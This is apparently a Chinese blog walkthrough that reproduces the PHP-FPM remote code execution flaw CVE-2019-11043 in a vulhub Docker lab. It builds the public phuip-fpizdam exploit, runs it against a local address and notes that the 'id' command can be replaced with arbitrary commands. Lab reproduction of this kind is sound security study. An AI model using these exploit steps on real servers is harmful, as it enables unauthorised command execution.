PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现环境搭建git clone https://github.com/vulhub/vulhub.gitcd vulhub/php/CVE-2019-11043docker-compose up -d访问安装漏洞利用工具git clone https://github.com/neex/phuip-fpizdam.gitcd phui
·
PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
环境搭建
git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043
docker-compose up -d
访问
安装漏洞利用工具
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go env -w GOPROXY=https://goproxy.cn
go get -v && go build
攻击
go run . "http://192.168.125.1:8080/index.php"
显示漏洞利用成功
浏览器进行访问,成功复现,id可替换为其他命令
报错及解决方法
报错原因:默认使用proxy.golang.org,国内无法访问
解决方法:更换为国内代理
执行命令
go env -w GOPROXY=https://goproxy.cn
更多推荐
已为社区贡献2条内容
所有评论(0)